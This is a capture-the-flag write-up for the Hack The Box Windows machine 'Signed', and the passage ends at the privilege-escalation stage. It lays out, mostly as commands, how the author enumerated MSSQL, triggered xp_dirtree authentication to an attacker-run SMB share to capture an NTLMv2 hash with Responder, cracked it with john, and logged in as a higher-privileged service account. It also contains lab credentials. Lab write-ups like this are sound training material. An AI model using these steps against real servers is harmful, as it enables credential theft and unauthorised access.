Hack The Box: Signed Machine Write-up.

Machine Information

• Name: Signed
• Difficulty: Medium
• OS: Windows
• IP: 10.10.11.90
• Key Focus: MSSQL exploitation, Kerberos Silver Ticket forging, privilege escalation

Initial Credentials

Username: scott
Password: Sm230#C5NatH

Reconnaissance

Nmap Scan

nmap -p 1-65535 -T4 -A -v 10.10.11.90

Results:

• Port 1433/tcp open - Microsoft SQL Server 2022 16.00.1000.00 RTM
• Domain: SIGNED.HTB
• Computer Name: DC01.SIGNED.HTB
• NetBIOS Domain: SIGNED

Host File Update

echo "10.10.11.90 DC01.SIGNED.HTB SIGNED.HTB" >> /etc/hosts

MSSQL Enumeration

Initial Connection

impacket-mssqlclient signed.htb/scott:'Sm230#C5NatH'@10.10.11.90

Check xp_cmdshell Status

enable_xp_cmdshell

Result: Failed - insufficient privileges with scott account

Enumerate Users

enum_users

Findings:

• dbo mapped to sa login as db_owner
• guest has no mapped login (scott is mapped to guest with minimal privileges)

Verify xp_dirtree Permissions

SELECT OBJECT_ID('master..xp_dirtree') AS objid
SELECT HAS_PERMS_BY_NAME('master..xp_dirtree','OBJECT','EXECUTE') AS can_execute_xp_dirtree

Result: Execution permissions confirmed (value = 1)

Hash Capture via SMB Relay

Start Responder

responder -I tun0

Trigger SMB Authentication

xp_dirtree \\10.10.16.xx\share

Captured Hash

mssqlsvc::SIGNED:...[NTLMv2 hash]...

Crack the Hash

john --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc.hash

Password Retrieved: purPLE9795!@

Elevated MSSQL Access

Connect as mssqlsvc

mssqlclient.py 'signed.htb/mssqlsvc:purPLE9795!@@10.10.11.90' -windows-auth

Check sysadmin Role Members

SELECT r.name AS role, m.name AS member 
FROM sys.server_principals r 
JOIN sys.server_role_members rm ON r.principal_id=rm.role_principal_id 
JOIN sys.server_principals m ON rm.member_principal_id=m.principal_id 
WHERE r.name='sysadmin';

Key Finding: SIGNED\IT group has sysadmin privileges